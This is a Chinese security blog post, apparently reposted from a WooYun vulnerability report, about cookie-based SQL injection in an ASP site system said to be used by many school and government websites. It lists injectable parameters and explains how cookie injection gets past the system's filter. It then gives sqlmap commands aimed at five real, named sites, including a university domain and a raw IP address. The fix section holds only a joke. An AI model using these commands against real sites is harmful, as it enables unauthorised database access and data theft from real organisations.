某系统存在多处Cookie注入 – 网站安全 – 自学php

时间: 2020-10-11|tag: 50次围观|0 条评论

某系统存在多处Cookie注入,影响大量学校政府网站

#1.借助前人经验:http://wooyun.org/bugs/wooyun-2014-062080

 首先发现这个系统很多人用,后来发现存在大量的sql注入可以使用sqlmap进行中转注入。

 

注入点:
 

otype.asp?classid=
onews.asp?id=
type_all.asp?classid=
DownloadShow.asp?ID=
search.asp?key=

等一系列注入点,虽然该系统存在防注入系统,但可以通过cookie中转注入吧,然后你可以淫荡得注入了~

#2.枚举5例测试注入点,这里测试第一个注入点为准~

 

C:\Python27\sqlmap>sqlmap.py -u "http://www.fj961.com/otype.asp" --cookie "class
id=1" --level 2

 

某系统存在多处Cookie注入 – 网站安全 – 自学php插图

 

C:\Python27\sqlmap>sqlmap.py -u "http://121.28.14.48/otype.asp" --cookie "classi
d=2" --level 2 --tables

 

某系统存在多处Cookie注入 – 网站安全 – 自学php插图1

 

C:\Python27\sqlmap>sqlmap.py -u "http://www.olpkeps.com/otype.asp" --cookie "cla
ssid=2" --level 2 --tables

 

某系统存在多处Cookie注入 – 网站安全 – 自学php插图2

 

C:\Python27\sqlmap>sqlmap.py -u "http://www.changqingschool.com/otype.asp" --coo
kie "classid=1" --level 2

 

某系统存在多处Cookie注入 – 网站安全 – 自学php插图3

 

C:\Python27\sqlmap>sqlmap.py -u "http://www1.gdufs.edu.cn/gwkyc/otype.asp" --coo
kie "classid=2" --level 2

 

某系统存在多处Cookie注入 – 网站安全 – 自学php插图4

 

修复方案:

gov的我就不注入了吧
    上一篇: 前沿同创科技官网文件包含导致获取服务器shel

    下一篇: ECShop任意用户密码盲改漏洞 - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《某系统存在多处Cookie注入 – 网站安全 – 自学php
   

还没有人抢沙发呢~